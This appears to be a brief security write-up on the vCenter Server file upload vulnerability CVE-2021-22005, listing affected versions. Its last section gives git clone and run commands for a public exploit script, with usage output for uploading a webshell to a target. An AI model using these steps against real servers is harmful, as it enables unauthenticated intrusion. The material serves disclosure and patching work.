Introduction to 0x01 Vulnerability
On September 21, 2021, VMware issued a security bulletin, publicly disclosing 19 security vulnerabilities in vCenter Server. The CVSSv3 scores for these vulnerabilities ranged from 4.3 to 9.8.
Among them, the most serious vulnerability is the arbitrary file upload vulnerability in vCenter Server (CVE-2021-22005), which exists in the analysis service of vCenter Server, and its CVSSv3 score is 9.8. An attacker who has network access to port 443 on vCenter Server can remotely execute code on vCenter Server by uploading malicious files. The vulnerability can be exploited remotely without authentication, the attack complexity is low, and no user interaction is required.
0x02 Scope of influence
- vCenter Server 7.0 < 7.0 U2c build-18356314
- vCenter Server 6.7 < 6.7 U3o build-18485166
- Cloud Foundation (vCenter Server) 4.x < KB85718 (4.3)
- Cloud Foundation (vCenter Server) 3.x < KB85719 (18.104.22.168)
6.7 The vCenters Windows version is not affected
0x03 vulnerability analysis
Note: This exp can only hit the Linux version of vCenter.
git clone https://github.com/shmilylty/cve-2021-22005-exp.git cd cve-2021-22005-exp python3 exp.py -h
usage: exp [-h] -t TARGET [-s SHELL] [-p PROXY] optional arguments: -h, --help show this help message and exit -t TARGET, --target TARGET target url(e.g. https://192.168.1.1) -s SHELL, --shell SHELL local webshell file path(default cmd.jsp) -p PROXY, --proxy PROXY request proxy(e.g. http://127.0.0.1:1080)
This exp has passed the test of the target version VMware vCenter Server 7.0.0 build-16323968.